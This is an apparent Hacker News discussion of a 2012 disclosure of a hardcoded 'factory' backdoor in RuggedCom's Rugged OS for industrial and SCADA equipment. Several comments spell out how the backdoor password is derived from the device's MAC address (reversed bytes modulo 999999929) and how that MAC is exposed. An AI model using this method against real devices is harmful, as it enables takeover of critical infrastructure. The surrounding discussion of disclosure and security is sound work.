
Rugged OS (industry, military & power plant OS) has backdoor into SCADA networks - fpp
http://seclists.org/fulldisclosure/2012/Apr/277
======
matthavener
Every RuggedCom device starts with 00-0A-DC
(<http://www.coffer.com/mac_find/?string=ruggedcom>). Even without the MAC,
you really only have to search 2^24 possible passwords. And that's assuming
they randomize their mac allocations.

~~~
0x0
And since the MAC address is visible in the ARP table and on the ethernet, if
you're simply able to TCP connect, the MAC address is already given!

------
fpp
What is most disturbing is that they knew about this since a year now and have
still not acted on that - even with all the press around Stuxnet.

BTW - RuggedCom was recently sold to Siemens for C$382 million - hope they
have informed them about this issue otherwise I guess it soon will be lawyer
time.

~~~
lawnchair_larry
No worries. Siemens backdoors are even worse.

~~~
drucken
Indeed. Siemens vulnerabilities is precisely how Stuxnet worked.

------
kiba
The best way to compromise national security is to have backdoors in the name
of national security.

~~~
gvb
The backdoor has national, international, and local security _implications._
The user name is "factory" and the password is based on the unit's MAC
address. That pretty strongly indicates it was intended for factory
initialization and recovery of mis-configured devices, not a backdoor in the
name of "national security".

"Factory" user/password combinations have long been a problem - often not
revealed to the purchaser of the equipment[1][2]. This one is especially bad
because it cannot be disabled even if the user knows about it.

[1] <http://all.net/CID/Attack/papers/BadDefaults.html>

[2] Oracle is notorious for default users/passwords
[http://www.petefinnigan.com/default/default_password_list.ht...](http://www.petefinnigan.com/default/default_password_list.htm)

------
swdunlop
This is a common problem in industrial firmware; Allen Bradley PLC's and
frequency drives had a well known backdoor for years prior to the Rockwell
acquisition. (And for some time after, since AB can't retire an old product.)

------
lifeisstillgood
So, now that this is out, what do the admins for these compromis-able systems
do. Presumably RuggedCom has not got a patch out yet, so they just sit there?

Not a good day.

~~~
elithrar
> So, now that this is out, what do the admins for these compromis-able
> systems do. Presumably RuggedCom has not got a patch out yet, so they just
> sit there?

There are often no "admins" of these systems. They are installed, the support
contract lapses, and they continue to run—vulnerabilities and all. Sometimes
there may have been an air-gap, but a desire for remote management results in
a 'net link being connected. A VPN or firewall is typically the only security
in-place.

The systems often run beyond what we in IT could call a sensible shelf live,
because they're the control system for a major plant or piece of
infrastructure. Shutting them down to do the upgrade bears a cost of its own
(note that I am not condoning this behaviour).

It's disappointing, and dangerous, but hopefully as we move to more
generalised hardware and IE60850/IP (over ModBus, DNP3, etc) solutions, things
will improve. I think some organisations are running a race they're destined
to lose though, especially as intruders set their sights on these weaknesses.

~~~
lifeisstillgood
not so long ago botnets were used to blackmail sites into paying DDOS
"protection". Ifyou knew enough to command a piece ofplant to exceed it's
design parameters you could blackmail quite effectively. Stuxnet but for
profit.

~~~
tripzilch
This is what I love about HN, always looking to turn a bad situation in to a
profitable startup!

------
K2h
The exploit demo is written in PERL. Finally, something I can read and
understand.

~~~
rdark
Surprised no-one from the Perl community has complained about the lack of 'use
strict' in this 15 liner..

------
fromhet
What permissions does "factory" have in their systems then?

~~~
fpp
complete administrative control of the device

"...An attacker with knowledge of an ROS device's MAC address may be able to
gain complete administrative control of the device..."

see: <http://www.kb.cert.org/vuls/id/889195>

------
trout
What's interesting is the NERC CIP push from federal to get power distribution
devices onto a common IP network. I'm a bit fuzzy on the details, but there
are major incentives and/or regulations to doing this, and it's a pretty
important inflection point for the technology used in power companies. Even
then, there are only a handful of companies playing in that space (Ruggedcom,
Siemens, Cisco, some other traditional manufacturing PLC folks).

From my experience most of these devices are read-only monitors, but I'm sure
there are exceptions. This little issue could be a big deal for their
certification. I'm surprised they didn't take it more seriously. This is the
hackers-will-take-over-our-power-grid kind of scenario the public doesn't like
to think about.

------
bifrost
Basically, this is instant access to any control system out there. MAC address
can be had trivially. The researcher who did this did this with minimal
resources. Guess what a foreign government/agitator will do?

------
bootz15
Curious how the password generator got leaked... an insider?

~~~
shabble
The algorithm looks pretty trivial. All it does is take the mac address,
reverse the byte ordering, and use the result modulo 999999929.

That's probably simple enough that even I could read it in assembly and figure
it out. I don't know if getting a firmware image is difficult, but the actual
generator certainly isn't the hard part here.

I'm wondering if that modulo value has any meaning - looking at it in a few
different formats hasn't immediately struck any sparks with me.

~~~
excuse-me
That's the sort of password an idiot would have on their luggage .......

Downvote? People don't watch the classics anymore!

~~~
Tomis02
You're on a forum full of self-important humourless people, what did you
expect? Mind the downvotes.

------
stef25
So you don't need Stuxnet anymore?

